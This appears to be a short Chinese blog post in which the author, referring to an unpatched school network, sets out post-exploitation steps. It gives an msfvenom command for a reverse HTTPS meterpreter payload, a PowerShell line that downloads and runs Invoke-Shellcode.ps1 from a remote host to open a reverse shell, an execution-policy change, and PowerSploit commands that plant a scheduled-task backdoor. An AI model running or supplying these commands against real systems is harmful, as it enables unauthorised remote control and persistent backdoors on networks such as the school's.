前一阵子的勒索病毒没传进学校,所以大家还是开开心心以为很安全,ms17010的洞也可以开开心心继续玩了。不过学校的服务器是加强了防御,正好当时在香港看geekpwn,回来发现大清亡了233。
打江山易守江山难,研究了一下常见的权限控制方法。
powersploit
1 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST=ip LPORT=4444 -f powershell -o /var/www/html/test |
先生成一个payload
1 | IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.129/CodeExecution/Invoke-Shellcode.ps1") |
执行这三条反弹一个meterpreter
有可能执行失败,显示没有脚本权限,在管理员权限下执行
1 | set-ExecutionPolicy RemoteSigned |
然后是后门
1 | $upo = new-userpersistenceoption -scheduledtask -OnIdle |
这几条命令生成一个Persistence.ps1,放到目标上执行就会写进计划任务,这是闲时,也可以hourly。理论上可以从web加载,那就方便不少,但我现在下载运行会报错,感觉很难用。